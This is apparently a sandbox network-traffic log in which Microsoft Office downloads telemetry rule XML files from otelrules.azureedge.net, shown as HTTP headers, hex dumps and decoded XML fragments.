                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB046B576"
                                                                                                                                                                                    x-ms-request-id: 490736a9-701e-0097-7e01-42b8c1000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184937Z-174f7845968glpgnhC1EWR7uec00000010bg00000000r0tq
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:37 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    50192.168.2.64976113.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:37 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:37 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 400
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                    x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184937Z-174f78459684bddphC1EWRbht40000001040000000004bpr
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:37 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    51192.168.2.64976213.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:37 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:37 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 479
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                    x-ms-request-id: 8dfbf447-101e-0028-0f8e-3f8f64000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184937Z-174f7845968xr5c2hC1EWRd0hn0000000h6g00000000815a
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:38 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    52192.168.2.64976313.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:37 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:37 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 425
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                    ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                    x-ms-request-id: cb9203b6-501e-0029-2691-3fd0b8000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184937Z-174f7845968cdxdrhC1EWRg0en000000105000000000r5sk
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:38 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    53192.168.2.64976413.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:38 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:38 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 475
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                    x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184938Z-174f78459688l8rvhC1EWRtzr00000000ctg00000000n3by
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:38 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    54192.168.2.64976513.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:38 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:39 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 448
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                    x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184939Z-174f7845968xr5c2hC1EWRd0hn0000000h4000000000eeh1
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:39 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    55192.168.2.64976613.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:39 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:40 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 491
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                    ETag: "0x8DC582B98B88612"
                                                                                                                                                                                    x-ms-request-id: 22106228-c01e-007a-5d36-40b877000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184940Z-174f7845968glpgnhC1EWR7uec00000010e000000000etu7
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:40 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    56192.168.2.64976713.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:39 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:40 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 416
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                    ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                    x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184940Z-174f7845968kvnqxhC1EWRmf3g0000000m600000000053ks
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:40 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    57192.168.2.64976813.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:39 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:40 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 479
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                    ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                    x-ms-request-id: 59a03737-a01e-00ab-1891-3f9106000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184940Z-174f7845968j6t2phC1EWRcfe800000010g000000000873h
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:40 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    58192.168.2.64977013.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:41 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:41 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                    ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                    x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184941Z-174f78459684bddphC1EWRbht4000000104g000000002zq9
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:41 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    59192.168.2.64977113.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
